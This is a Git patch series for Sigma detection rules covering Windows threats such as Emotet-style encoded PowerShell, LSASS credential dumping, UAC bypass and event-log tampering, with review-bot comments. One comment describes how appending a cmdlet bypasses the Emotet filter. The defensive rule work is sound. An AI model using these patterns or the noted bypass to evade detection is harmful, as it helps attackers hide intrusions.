--- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml @@ -4,7 +4,7 @@ status: stable description: Detects all Emotet like process executions that are not covered by the more generic rules author: Florian Roth date: 2019/09/30 -modified: 2021/11/29 +modified: 2022/09/27 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,12 @@ detection: - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+( - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+( - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+( - condition: selection + filter: + CommandLine|contains: + - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ' + - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA' + - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA' + condition: selection and not filter fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 55a1e537c..a25e7f125 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -7,7 +7,7 @@ references: - https://tools.thehacker.recipes/mimikatz/modules author: Florian Roth (rule), David ANDRE (additional keywords) date: 2021/12/20 -modified: 2022/04/27 +modified: 2022/09/27 logsource: category: process_creation product: windows 
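Review bot: The new `filter` suppresses matches on the base64 forms of `| ConvertTo-Json -ErrorAction SilentlyContinue`, i.e. on attacker-controllable payload content: appending that cmdlet to an otherwise Emotet-like encoded command defeats this `stable` rule. The Azure Guest Configuration false positives handled elsewhere in this series are attributed by the launching process, and that is the safer anchor here too — e.g. `ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'` — rather than a string the actor can add. If the content filter must stay, record the bypass in `falsepositives` or a comment above the filter.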
@@ -71,6 +71,8 @@ detection: filter_vs: Image|endswith: '\PING.EXE' ParentCommandLine|contains: '\DismFoDInstall.cmd' + filter_config_mgr: + ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: all of selection* and not 1 of filter* falsepositives: - Administrative activity From df60f30cc1ab92a4fed4de3e7ee733287c8499ce Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:21:09 +0200 Subject: [PATCH 101/120] Update file_event_win_cred_dump_tools_dropped_files.yml --- .../file_event/file_event_win_cred_dump_tools_dropped_files.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 04670a604..4f1bf73ac 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ author: Teymur Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/11/01 -modified: 2022/01/11 +modified: 2022/09/21 logsource: category: file_event product: windows From 224ea52dcde52e9d8bdf3e0627b2a2a8b97a3736 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:21:33 +0200 Subject: [PATCH 102/120] Update proc_creation_win_cmstp_com_object_access.yml --- .../proc_creation_win_cmstp_com_object_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 49f39268f..7f43b42ec 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml 
@@ -12,7 +12,7 @@ tags: - car.2019-04-001 author: Nik Seetharaman, Christian Burkard date: 2019/07/31 -modified: 2021/08/31 +modified: 2022/09/21 references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 From f9322f342c475c0743b902e8ceb521dbc3b89137 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:22:10 +0200 Subject: [PATCH 103/120] Update proc_creation_win_susp_sharpview.yml --- .../process_creation/proc_creation_win_susp_sharpview.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index 031873c26..2618a0472 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -8,6 +8,7 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/27 logsource: category: process_creation product: windows From 9b091811dda09b0674b2251007b5c1e84dbe8fa9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:22:34 +0200 Subject: [PATCH 104/120] Update proc_creation_win_uac_bypass_icmluautil.yml --- .../process_creation/proc_creation_win_uac_bypass_icmluautil.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index 81ef7abf7..0c5df3289 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml 
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface author: Florian Roth date: 2022/09/13 +modified: 2022/09/27 status: experimental references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html From 048de3fc81cf6f6457ac46e0a189b89231440dc8 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 27 Sep 2022 10:43:38 +0900 Subject: [PATCH 105/120] add diagnosis-scripted to windows services file --- tools/config/generic/windows-services.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 01b6d3de5..9861f29c6 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -166,3 +166,8 @@ logsources: service: bits-client conditions: Channel: 'Microsoft-Windows-Bits-Client/Operational' + windows-diagnosis-scripted: + product: windows + service: diagnosis-scripted + conditions: + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file From dd1fed29a05ae7bcafdf63dfcea0ba11fedc9cbf Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 27 Sep 2022 06:36:01 +0200 Subject: [PATCH 106/120] Add shell-core service --- tools/config/generic/windows-services.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 9861f29c6..0ca38a90f 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml 
@@ -170,4 +170,9 @@ logsources: product: windows service: diagnosis-scripted conditions: - Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' + windows-shell-core: + product: windows + service: shell-core + conditions: + Channel: 'Microsoft-Windows-Shell-Core/Operational' From b53f08b081e0a50099be9b9e8eced82097fdbaf2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 09:12:06 +0200 Subject: [PATCH 107/120] Update proc_creation_win_process_dump_rundll32_comsvcs.yml --- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index f8a26ecc7..e2f69aae4 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -14,7 +14,7 @@ references: - https://twitter.com/Wietze/status/1542107456507203586 author: Florian Roth, Modexp, Nasreddine Bencherchali (update) date: 2020/02/18 -modified: 2022/08/04 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.credential_access From 408bf9718153461f1583773f713ff0bc7bfab0e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 09:12:44 +0200 Subject: [PATCH 108/120] Update proc_creation_win_susp_renamed_createdump.yml --- .../proc_creation_win_susp_renamed_createdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml index 160414c51..32145a719 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml 
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -21,7 +21,7 @@ detection: CommandLine|contains|all: - ' -u ' # Short version of '--full' - ' -f ' # Short version of '--name' - - '.dmp ' + - '.dmp' filter: Image|endswith: '\createdump.exe' condition: 1 of selection* and not filter From 600494adbc74f8ed6b2914f075b8c2e2e2e8ecc4 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:11:08 +0500 Subject: [PATCH 109/120] Fix the filter --- ..._creation_win_teams_suspicious_command_line_cred_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index 3c0eb326c..7d72377f8 100644 --- a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -7,6 +7,7 @@ references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens date: 2022/09/16 +modified: 2022/09/27 logsource: product: windows category: process_creation @@ -16,7 +17,7 @@ detection: - '\Microsoft\Teams\Cookies' - '\Microsoft\Teams\Local Storage\leveldb' filter: - Image|contains: '\Microsoft\Teams\current\Teams.exe' + Image|endswith: '\Microsoft\Teams\current\Teams.exe' condition: selection and not filter falsepositives: - Unknown From de517ba8a217d0eae0efdfc0b229124b7f0291d8 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:21:48 +0500 Subject: [PATCH 110/120] Update proc_creation_win_uac_bypass_icmluautil.yml --- .../proc_creation_win_uac_bypass_icmluautil.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index db964e3ad..69665e04b 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface author: Florian Roth date: 2022/09/13 +modified: 2022/09/27 status: experimental references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html @@ -15,7 +16,7 @@ logsource: product: windows detection: selection: - Image|endswith: '\dllhost.exe' + ParentImage|endswith: '\dllhost.exe' ParentCommandLine: - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' From e46d19e450cc1f5df3faea914a7a0e5c5f67dc1e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 10:30:34 +0200 Subject: [PATCH 111/120] fix: condition --- .../powershell/powershell_script/posh_ps_web_request.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index 6ead22b8a..3b73fd598 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -29,7 +29,7 @@ detection: - 'Start-BitsTransfer' filter: Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' - condition: selection + condition: selection and not filter falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium From 5e6a926ac381c72a90d27f4c14e3e7a8ce5116c8 Mon Sep 17 00:00:00 2001 
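Review bot: This hunk inserts `modified: 2022/09/27` after `date: 2022/09/13`, which PATCH 104/120 in this same series already did at the same spot (its base blob is `81ef7abf7`, this one's is `db964e3ad`, so the two were made from different versions). If both land, the file either fails to apply or ends up with two `modified:` keys, which YAML loaders silently resolve to the last one; one of the two insertions should be dropped when the series is rebased.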
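Review bot: Switching the selection to `ParentImage|endswith: '\dllhost.exe'` makes it consistent with the `ParentCommandLine` list it is paired with, but that list still uses plain values (`'/Processid:{3E5FC7F9-...}'`), which in Sigma is an exact match of the whole command line unless a backend treats values as substrings; a real DllHost command line also carries the executable path before `/Processid:`, so as written the rule may never fire. If substring matching is intended, change the key to `ParentCommandLine|contains:`; the rest of the `selection` and the `condition` are outside the hunk, so confirm there is no wildcard form elsewhere first.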
From: Florian Roth Date: Tue, 27 Sep 2022 10:47:19 +0200 Subject: [PATCH 112/120] fix: FPs --- .../builtin/security/win_susp_lsass_dump_generic.yml | 7 +++++-- .../proc_creation_win_susp_gup_execution.yml | 3 ++- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 0942e28b4..cc71a77b0 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/09/18 +modified: 2022/09/27 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -64,6 +64,7 @@ detection: - C:\Windows\SysWow64\ - C:\Windows\SysNative\ - C:\Program Files\ + - C:\Program Files (x86)\ - C:\Windows\Temp\asgard2-agent\ - C:\ProgramData\Microsoft\Windows Defender\Platform\ filter2: @@ -72,7 +73,9 @@ detection: ProcessName: 'C:\Windows\CCM\CcmExec.exe' filter4: ProcessName: 'C:\Windows\System32\taskhostw.exe' - AccessMask: '0x10' + AccessMask: + - '0x10' + - '0x1410' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..bb8826b1e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml 
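Review bot: The added `C:\Program Files (x86)\` entry extends a prefix-only allowlist (its field key sits above the hunk) that already contains `C:\Program Files\`, so every binary under both Program Files trees is now exempt from the LSASS access-mask detection regardless of which product it belongs to. That is a wide carve-out for a credential-access rule; if the false positives came from one product, a dedicated filter on its full `ProcessName`, as `filter3` and `filter4` do, keeps the exemption narrow, and a comment naming the product would justify the prefix if it must stay. The second hunk's `AccessMask` list for taskhostw.exe is fine, though a short comment on why `0x1410` is expected (it is not obvious from the value) would help the next reviewer.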
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -19,6 +20,6 @@ detection: condition: selection and not filter falsepositives: - Other parent binaries using GUP not currently identified -level: high +level: medium tags: - attack.execution From be265d06ed12be2c12a26ddcf344ea74055fad9f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 11:51:48 +0200 Subject: [PATCH 113/120] fix: casing of field --- rules/windows/file_event/file_event_win_ripzip_attack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_ripzip_attack.yml b/rules/windows/file_event/file_event_win_ripzip_attack.yml index 7f71a7886..78039d23b 100644 --- a/rules/windows/file_event/file_event_win_ripzip_attack.yml +++ b/rules/windows/file_event/file_event_win_ripzip_attack.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk - TargetFileName|contains|all: + TargetFilename|contains|all: - '\Microsoft\Windows\Start Menu\Programs\Startup' - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}' Image|endswith: '\explorer.exe' From e90c91668d54f8c72eb9d840716c14d11132bdc9 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 27 Sep 2022 13:45:53 -0400 Subject: [PATCH 114/120] Update proc_creation_win_susp_psexesvc_as_system.yml Typo Fixed --- .../proc_creation_win_susp_psexesvc_as_system.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml index a61e012a5..14a3ff9bf 100644 
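Review bot: `modified: 2022/09/18` disagrees with the commit date (27 Sep) and with the sibling file in the same commit, win_susp_lsass_dump_generic.yml, which is stamped `2022/09/27`; if the edit really dates from the 18th this is fine, otherwise it should be `modified: 2022/09/27`. The second hunk lowers `level` to medium without saying why; the inline style used later in this series (`level: high # because unlikely legitimate use of that flag combination`) would record the reasoning next to the value.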
--- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec -author: FLorian Roth +author: Florian Roth date: 2022/07/21 tags: - attack.execution From 979502921feff32e1fe81fbab0087abdf6fb0a4c Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Wed, 28 Sep 2022 06:23:50 +0900 Subject: [PATCH 115/120] define security-mitigations service --- .../win_security_mitigations_defender_load_unsigned_dll.yml | 2 +- ..._security_mitigations_unsigned_dll_from_susp_location.yml | 2 +- tools/config/generic/windows-services.yml | 5 +++++ 3 files changed, 7 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index e1cdc5070..12ae57714 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -12,7 +12,7 @@ tags: - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: 
diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index 6c202bf1c..f5e425899 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -12,7 +12,7 @@ tags: - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 0ca38a90f..11bc25aa4 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -176,3 +176,8 @@ logsources: service: shell-core conditions: Channel: 'Microsoft-Windows-Shell-Core/Operational' + security-mitigations: + product: windows + service: security-mitigations + conditions: + Provider_Name: 'Microsoft-Windows-Security-Mitigations' \ No newline at end of file From e44e01e106bc673848269ae061842e465d6fba86 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Wed, 28 Sep 2022 06:32:34 +0900 Subject: [PATCH 116/120] update modified tag --- .../win_security_mitigations_defender_load_unsigned_dll.yml | 2 +- ...win_security_mitigations_unsigned_dll_from_susp_location.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index 12ae57714..aa7d64829 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml 
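Review bot: The new `security-mitigations` logsource keys on `Provider_Name` while every other entry visible in this file (`bits-client`, `diagnosis-scripted`, `shell-core`) keys on `Channel`; presumably the provider writes to more than one channel, but without a comment the next maintainer is likely to "normalise" it back to `Channel`. Add a comment above the condition such as `# matched on provider because its events are spread over several channels` once the reason is confirmed. The hunk also ends with `\ No newline at end of file`, the same defect PATCH 105 introduced and PATCH 106 then had to fix for `diagnosis-scripted`.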
+++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -6,7 +6,7 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj date: 2022/08/02 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index f5e425899..5e2c4ddce 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -6,7 +6,7 @@ references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali date: 2022/08/03 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 From 58b7c910dc423ce3a8f0b6f4d8fedd237e957364 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 23:50:35 +0200 Subject: [PATCH 117/120] Update proc_creation_win_w32tm.yml --- rules/windows/process_creation/proc_creation_win_w32tm.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml index 82bcbcc13..55c1d2255 100644 --- a/rules/windows/process_creation/proc_creation_win_w32tm.yml +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml 
@@ -1,7 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: experimental -description: When configured with suitable command line arguments,w32tm can act as a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains From e583d9fc39b6597bddec70c36d9bbc6c2ff66e70 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 23:52:22 +0200 Subject: [PATCH 118/120] Update proc_creation_win_w32tm.yml --- rules/windows/process_creation/proc_creation_win_w32tm.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml index 55c1d2255..f3881508c 100644 --- a/rules/windows/process_creation/proc_creation_win_w32tm.yml +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml @@ -24,7 +24,7 @@ detection: condition: all of selection_* falsepositives: - Legitimate use -level: medium +level: high # because unlikely legitimate use of that flag combination tags: - attack.discovery - attack.t1124 From a9dd6f7ff09849e134cb430b42aa05a23b0501fe Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 28 Sep 2022 09:53:46 +0200 Subject: [PATCH 119/120] Add registry_set_change_winevt_channelaccess (#3505) --- ...gistry_set_change_winevt_channelaccess.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml 
diff --git a/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml new file mode 100644 index 000000000..234213d68 --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml @@ -0,0 +1,30 @@ +title: Change Winevt Event Access Permission Via Registry +id: 7d9263bd-dc47-4a58-bc92-5474abab390c +description: Detects tampering with the "ChannelAccess" registry key in order to change access to windows event channel +author: frack113 +date: 2022/09/17 +status: experimental +references: + - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ + - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ + - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ +logsource: + category: registry_set + product: windows +detection: + selection: + EventType: SetValue + TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\' + TargetObject|endswith: '\ChannelAccess' + # Add more interesting combinations if you found them + Details|contains: + - '(A;;0x1;;;SY)' # Local System having GENERIC ALL + - '(A;;0x5;;;BA)' # Built-in administrators having GENERIC ALL and GENERIC WRITE + - '(A;;0x1;;;LA)' # Local administrator having GENERIC ALL + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1562.002 From a563422c82ba1ad61cca1f1e225d3d88be1d9c1e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Sep 2022 17:08:23 +0200 Subject: [PATCH 120/120] fix: filter definition in userinit rule --- .../proc_creation_win_susp_userinit_child.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
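Review bot: The inline comments on the three `Details|contains` values look wrong and invert what the rule is meant to catch: in a `ChannelAccess` SDDL the rights field is, to my knowledge, the event-log access mask (read/write/clear bits) rather than generic rights, so `(A;;0x1;;;SY)` reads as SYSTEM allowed read only, i.e. writes to the channel blocked, which is precisely the logging tampering attack.t1562.002 covers. Verify against the linked SDDL reference and replace the comments with the actual effect, e.g. `# SYSTEM limited to read — event writes to the channel blocked`, and likewise for the `BA` and `LA` entries. A sentence in `description` saying that these ACEs restrict rather than grant access would also help the analyst who triages a hit.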
diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml index b286838b9..589daabf4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/SBousseaden/status/1139811587760562176 author: Florian Roth (rule), Samir Bousseaden (idea) date: 2019/06/17 -modified: 2021/06/29 +modified: 2021/09/28 logsource: category: process_creation product: windows @@ -18,7 +18,7 @@ detection: filter2: - Image|endswith: '\explorer.exe' - ImageFileName: 'explorer.exe' - condition: selection and not filter1 and not filter2 + condition: selection and not 1 of filter* fields: - CommandLine - ParentCommandLine
